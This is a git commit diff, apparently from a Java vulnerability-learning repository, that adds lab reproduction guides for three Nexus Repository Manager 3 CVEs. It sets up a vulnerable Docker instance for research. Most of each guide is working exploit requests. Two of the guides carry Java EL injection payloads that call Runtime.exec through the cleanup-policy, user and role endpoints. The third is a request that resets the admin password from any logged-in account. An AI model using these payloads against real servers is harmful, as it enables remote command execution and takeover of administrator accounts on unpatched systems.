Merge branch 'nexus'

“threedr3am” · “threedr3am” · commit c296857e4b46 · 2020-04-07T11:58:43.000+08:00
diff --git a/nexus/CVE-2020-10199/README.md b/nexus/CVE-2020-10199/README.md
@@ -0,0 +1,102 @@
+CVE-2020-10199 Nexus Repository Manager 3
+
+影响版本：<= 3.21.1
+Affected Versions:  All previous Nexus Repository Manager 3.x OSS/Pro versions up to and including 3.21.1
+
+Fixed in Version:  Nexus Repository Manager OSS/Pro version 3.21.2
+
+### 1. 拉取镜像
+```
+docker pull sonatype/nexus3:3.21.1
+```
+
+### 2. 创建nexus数据目录
+```
+mkdir /your-dir/nexus-data && chown -R 200 /your-dir/nexus-data
+```
+
+### 3. 运行nexus docker镜像
+```
+docker run -d --rm -p 8081:8081 -p 5050:5050 --name nexus -v /your-dir/nexus-data:/nexus-data -e INSTALL4J_ADD_VM_PARAMS="-Xms2g -Xmx2g -XX:MaxDirectMemorySize=3g  -Djava.util.prefs.userRoot=/nexus-data -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050" sonatype/nexus3::3.21.1
+```
+
+### 4. github下载源码 & idea远程debug
+```
+git clone https://github.com/sonatype/nexus-public.git
+git checkout -b release-3.21.0-05 origin/release-3.21.0-05
+```
+idea创建远程debug-启动
+```
+-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050
+```
+
+### 5. 登陆任何一个账号
+
+### 6. 调用接口
+1. 创建CleanupPolicy：
+```
+POST /service/extdirect HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 381
+Pragma: no-cache
+Cache-Control: no-cache
+Sec-Fetch-Dest: empty
+X-Requested-With: XMLHttpRequest
+X-Nexus-UI: true
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.047908797369389244
+Content-Type: application/json
+Accept: */*
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.047908797369389244; NXSESSIONID=56f75e54-fa62-43af-8f61-595c1a84c7bc
+Connection: close
+
+{"action":"cleanup_CleanupPolicy","method":"create","data":[{"name":"threedr3am","format":"$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}","notes":"222","mode":"delete","lastBlobUpdatedEnabled":false,"lastDownloadedEnabled":false,"releaseTypeEnabled":false,"regexEnabled":false,"criteria":{}}],"type":"rpc","tid":33}
+```
+
+2. 创建repositories：
+```
+POST /service/rest/beta/repositories/apt/hosted HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 342
+Pragma: no-cache
+Cache-Control: no-cache
+accept: application/json
+Sec-Fetch-Dest: empty
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.047908797369389244
+Content-Type: application/json
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.047908797369389244; NXSESSIONID=56f75e54-fa62-43af-8f61-595c1a84c7bc
+Connection: close
+
+{
+  "name": "interna1l",
+  "online": true,
+  "storage": {
+    "blobStoreName": "default",
+    "strictContentTypeValidation": true,
+    "writePolicy": "allow_once"
+  },
+  "cleanup": {
+    "policyNames": ["threedr3am"]
+  },
+  "apt": {
+    "distribution": "bionic"
+  },
+  "aptSigning": {
+    "keypair": "string",
+    "passphrase": "string"
+  }
+}
+```
diff --git a/nexus/CVE-2020-10204/README.md b/nexus/CVE-2020-10204/README.md
@@ -0,0 +1,79 @@
+CVE-2020-10204 Nexus Repository Manager 3
+
+影响版本：<= 3.21.1
+Affected Versions:  All previous Nexus Repository Manager 3.x OSS/Pro versions up to and including 3.21.1
+
+Fixed in Version:  Nexus Repository Manager OSS/Pro version 3.21.2
+
+### 1. 拉取镜像
+```
+docker pull sonatype/nexus3:3.21.1
+```
+
+### 2. 创建nexus数据目录
+```
+mkdir /your-dir/nexus-data && chown -R 200 /your-dir/nexus-data
+```
+
+### 3. 运行nexus docker镜像
+```
+docker run -d --rm -p 8081:8081 -p 5050:5050 --name nexus -v /your-dir/nexus-data:/nexus-data -e INSTALL4J_ADD_VM_PARAMS="-Xms2g -Xmx2g -XX:MaxDirectMemorySize=3g  -Djava.util.prefs.userRoot=/nexus-data -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050" sonatype/nexus3::3.21.1
+```
+
+### 4. github下载源码 & idea远程debug
+```
+git clone https://github.com/sonatype/nexus-public.git
+git checkout -b release-3.21.0-05 origin/release-3.21.0-05
+```
+idea创建远程debug-启动
+```
+-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050
+```
+漏洞点在 org.sonatype.nexus.common.template.EscapeHelper#stripJavaEl 被绕过
+
+### 5. 登陆任何一个账号
+
+### 6. 调用更新role接口
+1. 利用更新用户接口：
+```
+POST /service/extdirect HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 301
+accept: application/json
+Sec-Fetch-Dest: empty
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.16936373694860252
+Content-Type: application/json
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.16936373694860252; NXSESSIONID=4e5437b3-7755-4784-bda6-d004e8f589fb
+Connection: close
+
+{"action":"coreui_User","method":"update","data":[{"userId":"www","version":"2","firstName":"www","lastName":"www","email":"www@qq.com","status":"active","roles":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"]}],"type":"rpc","tid":9}
+```
+
+2. 利用创建角色接口：
+```
+POST /service/extdirect HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 294
+accept: application/json
+Sec-Fetch-Dest: empty
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.856555763510765
+Content-Type: application/json
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.856555763510765; NXSESSIONID=da418706-f4e4-468e-93ac-de9c46802f11
+Connection: close
+
+{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"],"roles":[]}],"type":"rpc","tid":89}
+```
diff --git a/nexus/CVE-2020-11444/README.md b/nexus/CVE-2020-11444/README.md
@@ -0,0 +1,61 @@
+CVE-2020-11444 Nexus Repository Manager 3
+
+影响版本：<= 3.21.2
+Affected Versions:  All previous Nexus Repository Manager 3 OSS/Pro versions up to and including 3.21.2
+
+Fixed in Version:  Nexus Repository Manager OSS/Pro version 3.22.0
+
+### 1. 拉取镜像
+```
+docker pull sonatype/nexus3:3.21.2
+```
+
+### 2. 创建nexus数据目录
+```
+mkdir /your-dir/nexus-data && chown -R 200 /your-dir/nexus-data
+```
+
+### 3. 运行nexus docker镜像
+```
+docker run -d --rm -p 8081:8081 -p 5050:5050 --name nexus -v /your-dir/nexus-data:/nexus-data -e INSTALL4J_ADD_VM_PARAMS="-Xms2g -Xmx2g -XX:MaxDirectMemorySize=3g  -Djava.util.prefs.userRoot=/nexus-data -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050" sonatype/nexus3::3.21.2
+```
+
+### 4. github下载源码 & idea远程debug
+```
+git clone https://github.com/sonatype/nexus-public.git
+git checkout -b release-3.21.0-05 origin/release-3.21.0-05
+```
+idea创建远程debug-启动
+```
+-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050
+```
+漏洞点在 org.sonatype.nexus.security.internal.rest.UserApiResource#changePassword 接口
+
+新版本在 org.sonatype.nexus.security.internal.DefaultSecuritySystem#changePassword(java.lang.String, java.lang.String, boolean) 修复
+
+### 5. 登陆任何一个账号
+
+### 6. 调用更新role接口
+数据包：
+```
+PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 6
+accept: application/json
+Sec-Fetch-Dest: empty
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.6080434247960143
+Content-Type: text/plain
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID=af3706e2-dc9e-47fa-9739-edb6b3d512fe
+Connection: close
+
+123456
+```
+
+### 7. 使用admin & 123456登陆，获得最高管理员权限
diff --git a/nexus/pom.xml b/nexus/pom.xml
@@ -0,0 +1,15 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <parent>
+    <artifactId>learn-java-bug</artifactId>
+    <groupId>com.xyh</groupId>
+    <version>1.0-SNAPSHOT</version>
+  </parent>
+  <modelVersion>4.0.0</modelVersion>
+
+  <artifactId>nexus</artifactId>
+
+
+</project>
diff --git a/pom.xml b/pom.xml
@@ -23,6 +23,7 @@
     <module>cas</module>
     <module>ShardingSphere-UI</module>
     <module>shiro</module>
+    <module>nexus</module>
   </modules>
 
   <name>learn-java-bug</name>
